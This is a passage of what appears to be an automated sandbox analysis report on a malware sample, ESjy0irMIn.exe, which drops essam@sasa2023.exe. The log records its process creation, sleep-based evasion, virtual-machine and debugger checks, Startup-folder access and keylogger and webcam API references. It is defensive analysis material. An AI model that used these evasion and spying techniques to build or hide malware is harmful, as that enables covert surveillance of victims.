        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEJump to behavior
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exe TID: 6644Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\ProgramData\essam@sasa2023.exe TID: 7176Thread sleep time: -30000s >= -30000sJump to behavior
        Source: C:\ProgramData\essam@sasa2023.exe TID: 7176Thread sleep count: 290 > 30Jump to behavior
        Source: C:\ProgramData\essam@sasa2023.exe TID: 7176Thread sleep time: -290000s >= -30000sJump to behavior
        Source: C:\ProgramData\essam@sasa2023.exe TID: 7460Thread sleep count: 3617 > 30Jump to behavior
        Source: C:\ProgramData\essam@sasa2023.exe TID: 7176Thread sleep count: 5490 > 30Jump to behavior
        Source: C:\ProgramData\essam@sasa2023.exe TID: 7176Thread sleep time: -5490000s >= -30000sJump to behavior
        Source: C:\ProgramData\essam@sasa2023.exe TID: 7652Thread sleep time: -30000s >= -30000s
        Source: C:\ProgramData\essam@sasa2023.exe TID: 7668Thread sleep time: -922337203685477s >= -30000s
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_2-16715
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\splwow64.exeLast function: Thread delayed
        Source: C:\Windows\splwow64.exeLast function: Thread delayed
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_2-15707
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\ProgramData\essam@sasa2023.exeThread delayed: delay time: 922337203685477
        Source: C:\ProgramData\essam@sasa2023.exeWindow / User API: threadDelayed 3617Jump to behavior
        Source: C:\ProgramData\essam@sasa2023.exeWindow / User API: threadDelayed 5490Jump to behavior
        Source: C:\ProgramData\essam@sasa2023.exeWindow / User API: foregroundWindowGot 1764Jump to behavior
        Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 9036
        Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 908
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_4-82003
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeDropped PE file which has not been started: C:\b53dd3b256ba71dad061693a386e\2052\SetupResources.dllJump to dropped file
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeDropped PE file which has not been started: C:\b53dd3b256ba71dad061693a386e\1049\SetupResources.dllJump to dropped file
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeDropped PE file which has not been started: C:\b53dd3b256ba71dad061693a386e\1043\SetupResources.dllJump to dropped file
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeDropped PE file which has not been started: C:\b53dd3b256ba71dad061693a386e\1044\SetupResources.dllJump to dropped file
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeDropped PE file which has not been started: C:\b53dd3b256ba71dad061693a386e\1042\SetupResources.dllJump to dropped file
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeDropped PE file which has not been started: C:\b53dd3b256ba71dad061693a386e\1045\SetupResources.dllJump to dropped file
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeDropped PE file which has not been started: C:\b53dd3b256ba71dad061693a386e\1046\SetupResources.dllJump to dropped file
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeDropped PE file which has not been started: C:\b53dd3b256ba71dad061693a386e\1025\SetupResources.dllJump to dropped file
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeDropped PE file which has not been started: C:\b53dd3b256ba71dad061693a386e\1055\SetupResources.dllJump to dropped file
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeDropped PE file which has not been started: C:\b53dd3b256ba71dad061693a386e\3082\SetupResources.dllJump to dropped file
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeDropped PE file which has not been started: C:\b53dd3b256ba71dad061693a386e\1053\SetupResources.dllJump to dropped file
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeDropped PE file which has not been started: C:\b53dd3b256ba71dad061693a386e\1029\SetupResources.dllJump to dropped file
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeDropped PE file which has not been started: C:\b53dd3b256ba71dad061693a386e\1028\SetupResources.dllJump to dropped file
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeDropped PE file which has not been started: C:\b53dd3b256ba71dad061693a386e\1033\SetupResources.dllJump to dropped file
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeDropped PE file which has not been started: C:\b53dd3b256ba71dad061693a386e\1035\SetupResources.dllJump to dropped file
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeDropped PE file which has not been started: C:\b53dd3b256ba71dad061693a386e\SetupUtility.exeJump to dropped file
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeDropped PE file which has not been started: C:\b53dd3b256ba71dad061693a386e\1031\SetupResources.dllJump to dropped file
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeDropped PE file which has not been started: C:\b53dd3b256ba71dad061693a386e\1036\SetupResources.dllJump to dropped file
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeDropped PE file which has not been started: C:\b53dd3b256ba71dad061693a386e\2070\SetupResources.dllJump to dropped file
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeDropped PE file which has not been started: C:\b53dd3b256ba71dad061693a386e\1032\SetupResources.dllJump to dropped file
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeDropped PE file which has not been started: C:\b53dd3b256ba71dad061693a386e\1030\SetupResources.dllJump to dropped file
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeDropped PE file which has not been started: C:\b53dd3b256ba71dad061693a386e\1040\SetupResources.dllJump to dropped file
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeDropped PE file which has not been started: C:\b53dd3b256ba71dad061693a386e\1041\SetupResources.dllJump to dropped file
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeDropped PE file which has not been started: C:\b53dd3b256ba71dad061693a386e\1037\SetupResources.dllJump to dropped file
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeDropped PE file which has not been started: C:\b53dd3b256ba71dad061693a386e\1038\SetupResources.dllJump to dropped file
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeDropped PE file which has not been started: C:\b53dd3b256ba71dad061693a386e\3076\SetupResources.dllJump to dropped file
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\ProgramData\essam@sasa2023.exeThread delayed: delay time: 30000Jump to behavior
        Source: C:\ProgramData\essam@sasa2023.exeThread delayed: delay time: 30000
        Source: C:\ProgramData\essam@sasa2023.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000
        Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeCode function: 2_2_0001774A GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLastError,GetLogicalDriveStringsW,CharUpperW,_wcschr,GetDiskFreeSpaceExW,2_2_0001774A
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeAPI call chain: ExitProcess graph end nodegraph_4-82154
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeAPI call chain: ExitProcess graph end nodegraph_4-72865
        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
        Source: wscript.exe, 00000007.00000002.1891454999.000001C1BB7B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: wscript.exe, 00000007.00000002.1891454999.000001C1BB7B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
        Source: essam@sasa2023.exe, 00000003.00000002.4193957410.0000000000F10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll5"/>
        Source: ESjy0irMIn.exe, 00000000.00000002.1753786714.000000001DE9F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ={pDp-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: essam@sasa2023.exe, 0000000B.00000002.1946499918.0000000004CC0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: VBoxService
        Source: netsh.exe, 00000005.00000002.1832796574.00000000012AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeCode function: 2_2_0001CA78 GetSystemInfo,2_2_0001CA78
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeCode function: 2_2_000192BB GetFileAttributesW,GetLastError,SetFileAttributesW,SetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,GetLastError,DeleteFileW,GetLastError,FindNextFileW,GetLastError,FindClose,RemoveDirectoryW,GetLastError,2_2_000192BB
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeCode function: 2_2_0001A7B1 FindFirstFileW,GetLastError,FindNextFileW,CloseHandle,FindClose,2_2_0001A7B1
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeCode function: 4_2_69A88097 memset,memset,FindFirstFileW,DeleteFileW,GetLastError,FindNextFileW,FindClose,4_2_69A88097
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeCode function: 4_2_69A74281 memset,EnterCriticalSection,FindFirstFileW,LeaveCriticalSection,ctype,FindNextFileW,FindClose,ResetEvent,CreateThread,CloseHandle,GetLastError,4_2_69A74281
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeCode function: 4_2_69D85B82 __EH_prolog3_GS,_memset,FindFirstFileW,FindNextFileW,FindClose,4_2_69D85B82
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeCode function: 4_2_69D8410A FindFirstFileW,GetFullPathNameW,SetLastError,_wcsrchr,_wcsrchr,4_2_69D8410A
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeCode function: 2_2_0001B4B3 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,2_2_0001B4B3
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeCode function: 2_2_000291D5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_000291D5
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeCode function: 4_2_69DCC78B VirtualProtect ?,-00000001,00000104,?4_2_69DCC78B
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeCode function: 2_2_0001621F GetTickCount,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,2_2_0001621F
        Source: C:\ProgramData\essam@sasa2023.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeMemory allocated: page read and write | page guardJump to behavior
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeCode function: 2_2_000291D5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_000291D5
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeCode function: 2_2_0002AE73 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0002AE73
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeCode function: 2_2_000297AE SetUnhandledExceptionFilter,2_2_000297AE
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeCode function: 4_2_009A45BE _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_009A45BE
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeCode function: 4_2_009A2BA5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_009A2BA5
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeCode function: 4_2_698FB38A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_698FB38A
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeCode function: 4_2_698F87C1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_698F87C1
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeCode function: 4_2_69A7171F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_69A7171F
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeCode function: 4_2_69DA76A7 __EH_prolog3,GetModuleHandleW,GetProcAddress,SetThreadStackGuarantee,SetUnhandledExceptionFilter,GetCommandLineW,4_2_69DA76A7
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeCode function: 4_2_69DCEB6A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_69DCEB6A
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeCode function: 4_2_69DCB091 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_69DCB091

        HIPS / PFW / Operating System Protection Evasion

        barindex
        .NET source code references suspicious native API functions
        Source: 11.2.essam@sasa2023.exe.4cc0000.5.raw.unpack, kl.csReference to suspicious API methods: MapVirtualKey(a, 0u)
        Source: 11.2.essam@sasa2023.exe.4cc0000.5.raw.unpack, kl.csReference to suspicious API methods: GetAsyncKeyState(num2)
        Source: 11.2.essam@sasa2023.exe.4cc0000.5.raw.unpack, OK.csReference to suspicious API methods: capGetDriverDescriptionA(wDriver, ref lpszName, 100, ref lpszVer, 100)
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeProcess created: C:\ProgramData\dotNetFx40_Client_setup.exe "C:\ProgramData\dotNetFx40_Client_setup.exe" Jump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeProcess created: C:\ProgramData\essam@sasa2023.exe "C:\ProgramData\essam@sasa2023.exe" Jump to behavior
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /i "C:\Users\user\AppData\Local\Temp\BlockersInfo1.rtfJump to behavior
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /i "C:\Users\user\AppData\Local\Temp\BlockersInfo2.rtfJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\ProgramData\essam@sasa2023.exe "C:\ProgramData\essam@sasa2023.exe" Jump to behavior
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeCode function: 4_2_69D7DF27 AllocateAndInitializeSid,4_2_69D7DF27
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeCode function: 4_2_69DA3657 GetSecurityDescriptorDacl,_malloc,InitializeSecurityDescriptor,_free,GetAclInformation,_malloc,_memcpy_s,SetSecurityDescriptorDacl,_free,_free,4_2_69DA3657
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Users\user\Desktop\ESjy0irMIn.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
